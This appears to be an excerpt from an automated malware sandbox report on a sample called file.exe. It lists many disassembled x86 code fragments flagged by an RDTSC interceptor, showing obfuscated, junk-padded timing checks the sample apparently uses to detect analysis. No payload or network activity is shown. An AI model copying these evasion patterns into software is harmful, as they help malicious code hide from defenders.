            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB3CD6 second address: CB3D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 push eax 0x00000007 jmp 00007F2B4D4AC9EAh 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 push edx 0x00000011 jmp 00007F2B4D4AC9EEh 0x00000016 pop edx 0x00000017 mov eax, dword ptr [eax] 0x00000019 jnl 00007F2B4D4AC9ECh 0x0000001f mov dword ptr [esp+04h], eax 0x00000023 jmp 00007F2B4D4AC9F2h 0x00000028 pop eax 0x00000029 jns 00007F2B4D4AC9ECh 0x0000002f mov ecx, dword ptr [ebp+122D3760h] 0x00000035 push 00000003h 0x00000037 mov ch, dh 0x00000039 push 00000000h 0x0000003b jnc 00007F2B4D4AC9E9h 0x00000041 mov dword ptr [ebp+122D2C83h], edx 0x00000047 push 00000003h 0x00000049 mov si, 0E0Ch 0x0000004d call 00007F2B4D4AC9E9h 0x00000052 push edi 0x00000053 pushad 0x00000054 push ecx 0x00000055 pop ecx 0x00000056 js 00007F2B4D4AC9E6h 0x0000005c popad 0x0000005d pop edi 0x0000005e push eax 0x0000005f pushad 0x00000060 jne 00007F2B4D4AC9E8h 0x00000066 jl 00007F2B4D4AC9E8h 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f mov eax, dword ptr [esp+04h] 0x00000073 push eax 0x00000074 push edx 0x00000075 je 00007F2B4D4AC9ECh 0x0000007b jl 00007F2B4D4AC9E6h 0x00000081 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB3D87 second address: CB3D8C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB3D8C second address: CB3D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB3FAC second address: CB3FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB4023 second address: CB4031 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push edx 0x0000000b pop edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB4031 second address: CB4036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB4036 second address: CB406C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F2B4D4AC9F3h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp+04h], eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F2B4D4AC9F5h 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: CB406C second address: CB4101 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a jmp 00007F2B4CC6E2AEh 0x0000000f push 00000003h 0x00000011 pushad 0x00000012 mov dword ptr [ebp+122D189Ah], ecx 0x00000018 ja 00007F2B4CC6E2A7h 0x0000001e popad 0x0000001f pushad 0x00000020 mov dword ptr [ebp+122D2C83h], esi 0x00000026 movsx edx, dx 0x00000029 popad 0x0000002a push 00000000h 0x0000002c push 00000003h 0x0000002e mov edi, 4DB82C00h 0x00000033 call 00007F2B4CC6E2A9h 0x00000038 pushad 0x00000039 jmp 00007F2B4CC6E2B0h 0x0000003e push ebx 0x0000003f jmp 00007F2B4CC6E2B1h 0x00000044 pop ebx 0x00000045 popad 0x00000046 push eax 0x00000047 jmp 00007F2B4CC6E2ADh 0x0000004c mov eax, dword ptr [esp+04h] 0x00000050 pushad 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F2B4CC6E2AFh 0x00000058 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB4101 second address: CB4149 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9F0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F2B4D4AC9F0h 0x0000000e popad 0x0000000f mov eax, dword ptr [eax] 0x00000011 jmp 00007F2B4D4AC9F8h 0x00000016 mov dword ptr [esp+04h], eax 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD416A second address: CD4170 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD4170 second address: CD417D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F2B4D4AC9E6h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD417D second address: CD41A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2AAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a jnp 00007F2B4CC6E2A6h 0x00000010 pop esi 0x00000011 popad 0x00000012 push ebx 0x00000013 push ebx 0x00000014 jno 00007F2B4CC6E2A6h 0x0000001a pop ebx 0x0000001b jo 00007F2B4CC6E2B2h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD28ED second address: CD28F7 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B4D4AC9E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3044 second address: CD3048 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD32D7 second address: CD32DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD32DD second address: CD32E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jc 00007F2B4CC6E2A6h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD38C6 second address: CD38DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4D4AC9EBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD38DC second address: CD3901 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B1h 0x00000007 jne 00007F2B4CC6E2A6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 js 00007F2B4CC6E2A6h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3901 second address: CD3905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3905 second address: CD3911 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F2B4CC6E2A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3911 second address: CD3924 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jno 00007F2B4D4AC9E6h 0x0000000b je 00007F2B4D4AC9E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3924 second address: CD392D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD3D07 second address: CD3D22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2B4D4AC9F5h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7AF3 second address: CD7B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a jbe 00007F2B4CC6E2A6h 0x00000010 popad 0x00000011 popad 0x00000012 push eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F2B4CC6E2B3h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD8D90 second address: CD8D95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA12C8 second address: CA12CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDF376 second address: CDF385 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EBh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDFC06 second address: CDFC0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0C9A second address: CE0CA1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CA1 second address: CE0CC3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jmp 00007F2B4CC6E2B6h 0x00000010 pop edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE0CC3 second address: CE0D3C instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2B4D4AC9ECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jng 00007F2B4D4AC9FFh 0x00000014 mov eax, dword ptr [eax] 0x00000016 je 00007F2B4D4AC9F4h 0x0000001c jmp 00007F2B4D4AC9EEh 0x00000021 mov dword ptr [esp+04h], eax 0x00000025 push edx 0x00000026 jmp 00007F2B4D4AC9EBh 0x0000002b pop edx 0x0000002c pop eax 0x0000002d jmp 00007F2B4D4AC9EFh 0x00000032 push 98A55DEBh 0x00000037 push eax 0x00000038 push edx 0x00000039 jo 00007F2B4D4AC9E8h 0x0000003f push esi 0x00000040 pop esi 0x00000041 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE135A second address: CE1382 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F2B4CC6E2A8h 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F2B4CC6E2B4h 0x00000017 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1382 second address: CE138C instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F2B4D4AC9E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE18D7 second address: CE18DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1C2B second address: CE1C2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1E01 second address: CE1E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F2B4CC6E2A8h 0x00000012 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1E28 second address: CE1E83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F2B4D4AC9E6h 0x00000009 jmp 00007F2B4D4AC9F1h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 nop 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F2B4D4AC9E8h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000019h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov di, 2BDEh 0x00000030 xchg eax, ebx 0x00000031 push ebx 0x00000032 pushad 0x00000033 je 00007F2B4D4AC9E6h 0x00000039 push ecx 0x0000003a pop ecx 0x0000003b popad 0x0000003c pop ebx 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 push edx 0x00000041 jl 00007F2B4D4AC9E6h 0x00000047 pop edx 0x00000048 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE1E83 second address: CE1E89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE24A1 second address: CE24B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jg 00007F2B4D4AC9E6h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3DDD second address: CE3DE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3DE1 second address: CE3DE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3DE5 second address: CE3DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3DEF second address: CE3E07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jo 00007F2B4D4AC9E6h 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 popad 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3E07 second address: CE3E3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 pop esi 0x00000009 push 00000000h 0x0000000b add si, EC0Ch 0x00000010 push 00000000h 0x00000012 mov dword ptr [ebp+122D353Ch], ecx 0x00000018 xchg eax, ebx 0x00000019 jmp 00007F2B4CC6E2B0h 0x0000001e push eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jbe 00007F2B4CC6E2ACh 0x00000027 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5356 second address: CE5367 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9EDh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE5367 second address: CE536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE536B second address: CE53B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov edi, ebx 0x0000000d push 00000000h 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F2B4D4AC9E8h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 mov edi, dword ptr [ebp+122D2A83h] 0x0000002f mov esi, dword ptr [ebp+122D2A27h] 0x00000035 push 00000000h 0x00000037 mov edi, dword ptr [ebp+122D3316h] 0x0000003d xchg eax, ebx 0x0000003e pushad 0x0000003f push eax 0x00000040 push edx 0x00000041 jg 00007F2B4D4AC9E6h 0x00000047 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE69E1 second address: CE69E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE69E5 second address: CE69E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE69E9 second address: CE69EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE69EF second address: CE69F4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE69F4 second address: CE6A18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 xor esi, 6AB9D46Eh 0x0000000e push 00000000h 0x00000010 sub esi, 5D4E66C1h 0x00000016 push 00000000h 0x00000018 mov edi, dword ptr [ebp+122D2CA1h] 0x0000001e push eax 0x0000001f pushad 0x00000020 push eax 0x00000021 push edx 0x00000022 push esi 0x00000023 pop esi 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6A18 second address: CE6A22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6A22 second address: CE6A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE6A26 second address: CE6A2A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE731C second address: CE7320 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA567 second address: CEA5EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pop edx 0x00000010 jmp 00007F2B4D4AC9F5h 0x00000015 popad 0x00000016 nop 0x00000017 sub dword ptr [ebp+122D1A43h], ecx 0x0000001d or di, 7EE7h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push ebp 0x00000027 call 00007F2B4D4AC9E8h 0x0000002c pop ebp 0x0000002d mov dword ptr [esp+04h], ebp 0x00000031 add dword ptr [esp+04h], 00000017h 0x00000039 inc ebp 0x0000003a push ebp 0x0000003b ret 0x0000003c pop ebp 0x0000003d ret 0x0000003e push 00000000h 0x00000040 jmp 00007F2B4D4AC9EAh 0x00000045 xchg eax, esi 0x00000046 jmp 00007F2B4D4AC9F1h 0x0000004b push eax 0x0000004c push ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f push ebx 0x00000050 pop ebx 0x00000051 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC5C2 second address: CEC636 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jp 00007F2B4CC6E2BAh 0x00000011 jmp 00007F2B4CC6E2B4h 0x00000016 nop 0x00000017 jno 00007F2B4CC6E2ACh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebx 0x00000024 call 00007F2B4CC6E2A8h 0x00000029 pop ebx 0x0000002a mov dword ptr [esp+04h], ebx 0x0000002e add dword ptr [esp+04h], 0000001Dh 0x00000036 inc ebx 0x00000037 push ebx 0x00000038 ret 0x00000039 pop ebx 0x0000003a ret 0x0000003b cmc 0x0000003c mov dword ptr [ebp+122D36AFh], edx 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push ebx 0x00000046 pushad 0x00000047 popad 0x00000048 pop ebx 0x00000049 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA7A1 second address: CEA7A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC636 second address: CEC63C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA7A5 second address: CEA7D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F2B4D4AC9F0h 0x0000000c jne 00007F2B4D4AC9E6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F2B4D4AC9EEh 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC63C second address: CEC640 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA7D5 second address: CEA7ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2B4D4AC9F4h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CED48C second address: CED491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEC775 second address: CEC805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F2B4D4AC9EEh 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e push ebx 0x0000000f mov ebx, dword ptr [ebp+122D35E6h] 0x00000015 pop ebx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d movzx edi, ax 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 push 00000000h 0x00000029 push ebp 0x0000002a call 00007F2B4D4AC9E8h 0x0000002f pop ebp 0x00000030 mov dword ptr [esp+04h], ebp 0x00000034 add dword ptr [esp+04h], 00000014h 0x0000003c inc ebp 0x0000003d push ebp 0x0000003e ret 0x0000003f pop ebp 0x00000040 ret 0x00000041 call 00007F2B4D4AC9F0h 0x00000046 mov di, cx 0x00000049 pop ebx 0x0000004a sbb ebx, 4ECBE1CAh 0x00000050 mov eax, dword ptr [ebp+122D001Dh] 0x00000056 xor dword ptr [ebp+122D17E1h], edi 0x0000005c push FFFFFFFFh 0x0000005e push eax 0x0000005f pushad 0x00000060 jg 00007F2B4D4AC9F2h 0x00000066 jmp 00007F2B4D4AC9ECh 0x0000006b jns 00007F2B4D4AC9ECh 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEE431 second address: CEE437 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF0386 second address: CF03A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B4D4AC9F5h 0x00000009 popad 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF13E8 second address: CF13F1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF05E2 second address: CF05E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF34EA second address: CF3523 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B4CC6E2B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e jmp 00007F2B4CC6E2B9h 0x00000013 pop eax 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF3523 second address: CF3529 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF4433 second address: CF443D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2B4CC6E2ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF443D second address: CF44B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007F2B4D4AC9F3h 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebp 0x00000010 call 00007F2B4D4AC9E8h 0x00000015 pop ebp 0x00000016 mov dword ptr [esp+04h], ebp 0x0000001a add dword ptr [esp+04h], 00000016h 0x00000022 inc ebp 0x00000023 push ebp 0x00000024 ret 0x00000025 pop ebp 0x00000026 ret 0x00000027 jmp 00007F2B4D4AC9F3h 0x0000002c push 00000000h 0x0000002e xor bh, FFFFFFDFh 0x00000031 push 00000000h 0x00000033 add dword ptr [ebp+122D2CF4h], ebx 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jl 00007F2B4D4AC9F4h 0x00000041 jmp 00007F2B4D4AC9EEh 0x00000046 push eax 0x00000047 push edx 0x00000048 ja 00007F2B4D4AC9E6h 0x0000004e rdtsc
